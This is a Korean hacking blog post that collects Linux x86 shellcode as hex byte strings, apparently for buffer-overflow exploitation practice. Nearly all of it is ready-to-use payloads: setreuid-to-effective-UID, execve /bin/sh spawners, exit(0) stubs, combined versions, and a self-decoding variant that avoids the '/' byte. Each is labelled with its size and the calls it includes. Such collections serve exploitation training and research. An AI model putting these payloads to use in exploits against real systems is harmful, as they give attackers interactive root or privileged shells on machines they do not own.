ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • 쉘 코드 정리
      hacking/system 2018. 11. 14. 02:40

      // 16 Bytesetreuid( geteuid() , geteuid() );

      \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80


      // 25 Byte, shellcode

      \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


      // 41 Byte

      \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


      // 48 Byte, without \x2f

      \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81



      출처: http://j4ckp4rd.tistory.com/44 [잭파드의 외장뇌]


      --------------------------------------------------------------------------------------------------------------------------------------------------------------------


      0x01. 가장 기본적으로 쉘을 띄우는 코드

      \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

      \xe1\x89\xc2\xb0\x0b\xcd\x80

      bytes : 25

      미포함 : setreuid(), exit()


      0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드

      \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

      \x31\xc0\xb0\x01\xcd\x80

      bytes : 31

      미포함 : setreuid()


      0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드

      \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

      bytes : 47


      0x04. exit(0) 코드

      \x31\xc0\xb0\x01\xcd\x80

      bytes : 6


      0x05. setreuid(geteuid(), geteuid()) 코드

      \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

      bytes : 16 


      Linux/x86 execve /bin/sh shellcode 23 bytes 

      \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


      linux x86 파일명 shellcode 48byte

      \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81


      --------------------------------------------------------------------------------------------------------------------------------------------------------------------


      저작자표시

      'hacking > system' 카테고리의 다른 글

      Format String 취약점이란?  (0) 2018.11.18

      관련글 관련글 더보기

    Designed by Tistory.

    티스토리툴바